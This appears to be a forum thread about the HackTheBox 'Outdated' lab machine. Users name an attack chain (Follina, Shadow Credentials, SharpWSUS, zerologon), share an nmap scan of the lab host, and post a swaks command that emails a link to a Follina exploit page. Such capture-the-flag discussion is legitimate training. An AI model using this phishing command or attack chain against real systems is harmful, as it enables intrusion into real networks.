Outdated - HTB
:heart:
Reply
I finally got root going the intended way. That is, Follina + Shadow Credentials + SharpWSUS.exe.

Overall, a nice machine; I learnt a few things. Thanks for all the hints.
Reply
(August 25, 2022, 06:53 PM)Exa Wrote: I finally got root going the intended way. That is, Follina + Shadow Credentials + SharpWSUS.exe.

Overall, a nice machine; I learnt a few things. Thanks for all the hints.



can you share your writeup kindly?
Reply
thanks
Reply
Guys, can you explain how to get user? I created a doc file using follina.py,
then tried to send an email, but it couldn't find the mail server:
└─# swaks --to [email protected] --from meow@meow --server mail.outdated.htb --body "10.10.14.58:8080/exploit.html"
=== Trying mail.outdated.htb:25...
*** Error connecting to mail.outdated.htb:25:
*** IO::Socket::INET6: getaddrinfo: Name or service not known


(August 13, 2022, 08:54 PM)yumi Wrote: zerologon worked


rooted


Hey, can you explain how to get user? I tried lots of ways but nothing works.
Reply
I'm still working on it!!
Reply
(August 13, 2022, 07:02 PM)wayxoo Wrote: Host is up (0.067s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp   open  domain        Simple DNS Plus
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-14T02:02:06+00:00; +6h59m43s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-14T02:02:05+00:00; +6h59m43s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-14T02:02:06+00:00; +6h59m43s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
Service Info: Hosts: mail.outdated.htb, DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m42s, deviation: 0s, median: 6h59m42s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-08-14T02:01:27
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.38 seconds
Reply
cool post thanks
Reply
:angel:
Reply
use follina exploit but doesn't work for me
Reply

